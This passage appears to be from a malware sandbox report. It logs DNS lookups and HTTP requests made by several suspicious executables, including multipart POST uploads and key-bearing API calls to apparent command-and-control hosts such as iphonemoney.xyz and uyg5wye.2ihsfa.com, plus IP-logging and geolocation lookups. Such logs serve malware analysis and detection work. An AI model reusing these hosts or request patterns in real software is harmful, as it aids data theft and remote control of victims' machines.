                                                                                                                                                                                        Priority: u=3,i
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        https://www.facebook.com/
                                                                                                                                                                                        arnatic_4.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        157.240.240.35:443
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET / HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                                                        Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
                                                                                                                                                                                        viewport-width: 1920
                                                                                                                                                                                        Sec-Fetch-Dest: document
                                                                                                                                                                                        Sec-Fetch-Mode: navigate
                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                        Sec-Fetch-User: ?1
                                                                                                                                                                                        Upgrade-Insecure-Requests: 1
                                                                                                                                                                                        Host: www.facebook.com
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Set-Cookie: fr=1OiN3r75WSILOjZxK..Bg3rzz.3q.AAA.0.0.Bg3rzz.AWVyHyGO2iU; expires=Thu, 30-Sep-2021 07:14:58 GMT; Max-Age=7775999; path=/; domain=.facebook.com; secure; httponly; SameSite=None
                                                                                                                                                                                        Set-Cookie: sb=87zeYHjRNneUvmkeESL4YY8A; expires=Sun, 02-Jul-2023 07:14:59 GMT; Max-Age=63072000; path=/; domain=.facebook.com; secure; httponly; SameSite=None
                                                                                                                                                                                        x-fb-rlafr: 0
                                                                                                                                                                                        Alt-Svc: h2="facebook2flrj4aii5a2wcjxa73az3b5trndi3pdi5zqji7alwjmfwad.onion:443"; ma=86400
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Cache-Control: private, no-cache, no-store, must-revalidate
                                                                                                                                                                                        Expires: Sat, 01 Jan 2000 00:00:00 GMT
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        content-security-policy: default-src * data: blob: 'self';script-src *.facebook.com *.fbcdn.net *.facebook.net *.google-analytics.com *.google.com 127.0.0.1:* 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src data: blob: 'unsafe-inline' *;connect-src *.facebook.com facebook.com *.fbcdn.net *.facebook.net wss://*.facebook.com:* wss://*.whatsapp.com:* attachment.fbsbx.com ws://localhost:* blob: *.cdninstagram.com 'self';block-all-mixed-content;upgrade-insecure-requests;
                                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                                        Strict-Transport-Security: max-age=15552000; preload
                                                                                                                                                                                        Content-Type: text/html; charset="utf-8"
                                                                                                                                                                                        X-FB-Debug: myg5RZf8gl8PopDFF/dcGqnSqvCPsd6gFYnFVYK1lFXlbPDcLWgoyGnlZLkahYMvFOr7Eu1csZQqQX00bQH6XQ==
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:14:59 GMT
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        iphonemoney.xyz
                                                                                                                                                                                        7398983.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        iphonemoney.xyz
                                                                                                                                                                                        IN A
                                                                                                                                                                                        Response
                                                                                                                                                                                        iphonemoney.xyz
                                                                                                                                                                                        IN A
                                                                                                                                                                                        172.67.182.129
                                                                                                                                                                                        iphonemoney.xyz
                                                                                                                                                                                        IN A
                                                                                                                                                                                        104.21.51.159
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        https://iphonemoney.xyz/api.php?getusers
                                                                                                                                                                                        7398983.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        172.67.182.129:443
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /api.php?getusers HTTP/1.1
                                                                                                                                                                                        Host: iphonemoney.xyz
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:14:56 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                        Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=siErtPGIaZlyX5YHai55Lak0LwnByKtCgUUHtNpnHEaX69RIIl7JasrB6KqvZBAA6Uqq3SGuxBzZU9%2FSh%2Fc6RrjfEdizmXqColdyvuB68QgxSJ6iZ5mgIdXVFpYA"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 6686147e5f9f4db8-FRA
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        https://iphonemoney.xyz/api.php
                                                                                                                                                                                        7398983.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        172.67.182.129:443
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /api.php HTTP/1.1
                                                                                                                                                                                        Host: iphonemoney.xyz
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:15:11 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                        Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=TzuYIy0XhgS7jQFBwQOCaONCKqvk4F3QSq0bQXy6B%2BnREI6TtWNo9kQY1wURQIddnkS11U5fV3r3q5hq0Or8GWQnJNHWPUJKzuwLWu1pA0dZXVuUArWvXvHUXGKR"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 668614d9bf274db8-FRA
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        https://iphonemoney.xyz/
                                                                                                                                                                                        7398983.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        172.67.182.129:443
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST / HTTP/1.1
                                                                                                                                                                                        Accept: text/html;q=0.9,*/*;q=0.8
                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=---------------------------8d93d289cb8be8f
                                                                                                                                                                                        Host: iphonemoney.xyz
                                                                                                                                                                                        Content-Length: 2844
                                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:15:11 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                        Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=kz4zkj1cVArStPoiwoSjVdomdv6JyZgdIrJY%2BbpgYh4HEEr6Vlb5LDrIbOuIMGNSioxP4GntUGIDRxz0n409rna9IWX96rU3Uh1Sy9G5oudTUI%2BLM2Ik9bypKF7n"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 668614dcd9c74db8-FRA
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://87.251.71.195:82/
                                                                                                                                                                                        arnatic_7.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        87.251.71.195:82
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST / HTTP/1.1
                                                                                                                                                                                        Content-Type: text/xml; charset=utf-8
                                                                                                                                                                                        SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                                                                                                                                        Host: 87.251.71.195:82
                                                                                                                                                                                        Content-Length: 137
                                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        sergeevih43.tumblr.com
                                                                                                                                                                                        BN2v6gd1v89066wDB6eRa3Rp.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        sergeevih43.tumblr.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        Response
                                                                                                                                                                                        sergeevih43.tumblr.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        74.114.154.22
                                                                                                                                                                                        sergeevih43.tumblr.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        74.114.154.18
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        https://sergeevih43.tumblr.com/
                                                                                                                                                                                        arnatic_1.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        74.114.154.22:443
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET / HTTP/1.1
                                                                                                                                                                                        Host: sergeevih43.tumblr.com
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        http://ip-api.com/json/?fields=8198
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        208.95.112.1:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /json/?fields=8198 HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: ip-api.com
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:15:01 GMT
                                                                                                                                                                                        Content-Type: application/json; charset=utf-8
                                                                                                                                                                                        Content-Length: 58
                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                        X-Ttl: 60
                                                                                                                                                                                        X-Rl: 44
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        uyg5wye.2ihsfa.com
                                                                                                                                                                                        jooyu.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        uyg5wye.2ihsfa.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        Response
                                                                                                                                                                                        uyg5wye.2ihsfa.com
                                                                                                                                                                                        IN A
                                                                                                                                                                                        88.218.92.148
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        http://uyg5wye.2ihsfa.com/api/fbtime
                                                                                                                                                                                        arnatic_4.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        88.218.92.148:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /api/fbtime HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
                                                                                                                                                                                        Host: uyg5wye.2ihsfa.com
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:15:12 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        X-Powered-By: PHP/7.3.21
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://uyg5wye.2ihsfa.com/api/?sid=290613&key=d7f614e3c3e5f3d02ab84fc794796c5b
                                                                                                                                                                                        arnatic_4.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        88.218.92.148:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /api/?sid=290613&key=d7f614e3c3e5f3d02ab84fc794796c5b HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
                                                                                                                                                                                        Content-Length: 266
                                                                                                                                                                                        Host: uyg5wye.2ihsfa.com
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:15:14 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        X-Powered-By: PHP/7.3.21
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        iw.gamegame.info
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        iw.gamegame.info
                                                                                                                                                                                        IN A
                                                                                                                                                                                        Response
                                                                                                                                                                                        iw.gamegame.info
                                                                                                                                                                                        IN A
                                                                                                                                                                                        104.21.21.221
                                                                                                                                                                                        iw.gamegame.info
                                                                                                                                                                                        IN A
                                                                                                                                                                                        172.67.200.215
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.21.221:80
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST /report7.4.php HTTP/1.1
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                                                                                                                                        Host: iw.gamegame.info
                                                                                                                                                                                        Content-Length: 278
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 403 Forbidden
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:15:02 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        CF-Chl-Bypass: 1
                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        cf-request-id: 0b07ab3bae0000627d4e267000000001
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=6fldDbYKlHt4SkcAEjWv18AnAF6ZArHUp1XoMQuZaogFY%2FMmzKYbuHTRLA4eQYhy3c%2Fcn0ZQQotXNuGJMBLt%2B2pKjMp3O76KTfAHw%2BfrIQ%2BYLYtSDTDhzodcxAvXJQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 668614a5ec1a627d-OTP
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        download-serv-235442.xyz
                                                                                                                                                                                        4460127.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        download-serv-235442.xyz
                                                                                                                                                                                        IN A
                                                                                                                                                                                        Response
                                                                                                                                                                                        download-serv-235442.xyz
                                                                                                                                                                                        IN A
                                                                                                                                                                                        104.21.54.72
                                                                                                                                                                                        download-serv-235442.xyz
                                                                                                                                                                                        IN A
                                                                                                                                                                                        172.67.136.97
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        https://download-serv-235442.xyz/api.php
                                                                                                                                                                                        4460127.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.54.72:443
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /api.php HTTP/1.1
                                                                                                                                                                                        Host: download-serv-235442.xyz
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:15:07 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                        Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=xINpfMYa46u0cEQa5nK1EZze8pIrkmTaM3MynnjUvC9b64X7YvaFPuPv7tPyS8etobi1L5n86eIVBxTxxILwwLro3nK7tj07i26%2F41d9Uz5USkMOnQDroMib3TPhJzpS5BSx9aHM"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 668614c22d6c1ccc-BUD
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        https://download-serv-235442.xyz/
                                                                                                                                                                                        4460127.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.54.72:443
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST / HTTP/1.1
                                                                                                                                                                                        Accept: text/html;q=0.9,*/*;q=0.8
                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=---------------------------8d93d289a7eed36
                                                                                                                                                                                        Host: download-serv-235442.xyz
                                                                                                                                                                                        Content-Length: 3784
                                                                                                                                                                                        Expect: 100-continue
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:15:23 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                        Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=zWr0XmFGkfIT1yTajoDWJvsRgucOxyEbMOaVF8Q%2BlBpKC9kJfwAS6Yc3CAxJ0L0rqgsXgviNABUjM6QM1l1N0Hmawkez%2BghirKXV64GgcxF3%2B6M%2BsjgF4DYClqHlYHVpkB3D72Nw"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 668614c5aa351ccc-BUD
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        iplogger.org
                                                                                                                                                                                        jooyu.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        iplogger.org
                                                                                                                                                                                        IN A
                                                                                                                                                                                        Response
                                                                                                                                                                                        iplogger.org
                                                                                                                                                                                        IN A
                                                                                                                                                                                        88.99.66.31
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        https://iplogger.org/1SPHi7
                                                                                                                                                                                        arnatic_5.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        88.99.66.31:443
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /1SPHi7 HTTP/1.1
                                                                                                                                                                                        User-Agent: Th624
                                                                                                                                                                                        Host: iplogger.org
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:15:07 GMT
                                                                                                                                                                                        Content-Type: image/png
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                        Set-Cookie: PHPSESSID=ur83p1m1vtrjaehtu51ugeun81; path=/; HttpOnly
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Set-Cookie: clhf03028ja=185.100.87.202; expires=Wed, 18-Jul-2029 05:49:51 GMT; Max-Age=253838084; path=/
                                                                                                                                                                                        Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                        Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                        Answers: 5
                                                                                                                                                                                        whoami: 27d91697e61e333e80570a3904bc4659139cd9f1a7251582095faa02cdc29a29
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000; preload
                                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        DNS
                                                                                                                                                                                        pcfixmy-download-13.xyz
                                                                                                                                                                                        3466090.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        8.8.8.8:53
                                                                                                                                                                                        Request
                                                                                                                                                                                        pcfixmy-download-13.xyz
                                                                                                                                                                                        IN A
                                                                                                                                                                                        Response
                                                                                                                                                                                        pcfixmy-download-13.xyz
                                                                                                                                                                                        IN A
                                                                                                                                                                                        104.21.46.30
                                                                                                                                                                                        pcfixmy-download-13.xyz
                                                                                                                                                                                        IN A
                                                                                                                                                                                        172.67.222.237
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        https://pcfixmy-download-13.xyz/api.php?getusers
                                                                                                                                                                                        3466090.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.46.30:443
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /api.php?getusers HTTP/1.1
                                                                                                                                                                                        Host: pcfixmy-download-13.xyz
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:15:08 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                        Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=O6xA9gbvdUamb9hLyOcNN%2BwMTBWXvHuCmle63dEAF%2Fwkbsw5wz%2FJkPVmj7TEDduCdmRag%2BzVDg%2FmDPc4Z7gchpP7xur2lpA4p7U4rjE92K8%2BZPbUeqOJWfy8loN2LUp4hsw19b0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 668614c6abddacac-OTP
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        GET
                                                                                                                                                                                        https://pcfixmy-download-13.xyz/api.php
                                                                                                                                                                                        3466090.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.46.30:443
                                                                                                                                                                                        Request
                                                                                                                                                                                        GET /api.php HTTP/1.1
                                                                                                                                                                                        Host: pcfixmy-download-13.xyz
                                                                                                                                                                                        Response
                                                                                                                                                                                        HTTP/1.1 200 OK
                                                                                                                                                                                        Date: Fri, 02 Jul 2021 07:15:33 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                        Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=0%2FoxkGZXyQv7SqpUzik8RhB3YusL1IAqwQIjQZBoJr24ZDZFP4Ege%2FijVsC0xQIJtl8yeAIEerimdhDEVDmJesGiglZ%2F46SfJ8B%2BQ33B0EmAAYkgrDC9dF6LoqGmrUN6jKdqgW4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                        NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                        CF-RAY: 66861565e97bacac-OTP
                                                                                                                                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                                                                                                      • flag-unknown
                                                                                                                                                                                        POST
                                                                                                                                                                                        https://pcfixmy-download-13.xyz/
                                                                                                                                                                                        3466090.exe
                                                                                                                                                                                        Remote address:
                                                                                                                                                                                        104.21.46.30:443
                                                                                                                                                                                        Request
                                                                                                                                                                                        POST / HTTP/1.1
                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=------------------------8d93d28aa3c32e0
